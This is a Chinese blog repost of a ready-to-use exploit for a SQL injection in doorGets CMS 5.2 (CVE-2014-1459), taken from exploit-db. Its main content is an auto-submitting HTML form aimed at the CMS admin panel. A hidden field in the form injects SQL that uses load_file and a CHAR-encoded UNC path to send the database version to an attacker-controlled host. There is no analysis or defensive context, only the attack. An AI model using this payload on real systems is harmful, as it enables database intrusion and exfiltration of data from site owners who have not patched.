时间: 2020-10-10|tag: 47次围观|0 条评论

官网:http://www.doorgets.com/   CVE:

<a href=”http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1459″ rel=”nofollow” target=”_blank”>2014-1459</a>   FROM:http://www.exploit-db.com/exploits/31521/   exp:

<pre class=”brush: html; gutter: true”><form action=”http://[host]/dg-admin/?controller=rubriques” method=”post” name=”main”>
<input type=”hidden” name=”_position_down_id” value=”1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) — “>
<input type=”hidden” name=”_position_down_position” value=”1″>
<input type=”hidden” name=”_position_down_submit” value=”1″>
<input type=”hidden” name=”_position_down_type” value=”down”>
<input type=”submit” id=”btn”>
</form>
<script>
document.getElementById(’btn’).click();
</script></pre>

 

    上一篇: PowerCDN官网SQL注入用户站点有被劫持风险 - 网站安

    下一篇: [安全科普]你必须了解的session的本质 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《doorGets CMS 5.2 SQL注入 – 网站安全 – 自学php
   

还没有人抢沙发呢~